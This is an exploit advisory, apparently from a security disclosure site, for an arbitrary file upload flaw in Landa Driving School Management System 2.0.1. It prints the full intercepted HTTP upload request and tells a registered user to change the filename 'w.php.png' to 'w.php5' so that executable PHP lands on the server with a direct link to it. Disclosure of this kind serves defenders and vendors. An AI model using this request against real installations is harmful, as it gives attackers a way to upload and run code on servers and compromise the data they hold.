Landa Driving School Management System 2.0.1 Arbitrary File Upload

2022.01.18
Credit: Sohel Yousef
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: Landa Driving School Management System Arbitrary File Upload # Version 2.0.1 # Google Dork: N/A # Date: 17/01/2022 # Exploit Author: Sohel Yousef - sohel.yousef@yandex.com # Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151 # Software link 2 :https://simcycreative.com/landa/ # Software Demo : https://landa.simcycreative.com/ # Category: webapps Landa Driving School Management System contain arbitrary file upload registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw details POST /profile/attachment/upload/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: */* Accept-Language: ar,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048 Content-Length: 294983 Origin: https://localhost Connection: close Referer: https://localhost/profile/91/ Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="name" sddd -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="csrf-token" e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="userid" 91 -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>> change this to w.php5 Content-Type: image/png you will have a direct link to the uploaded files


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top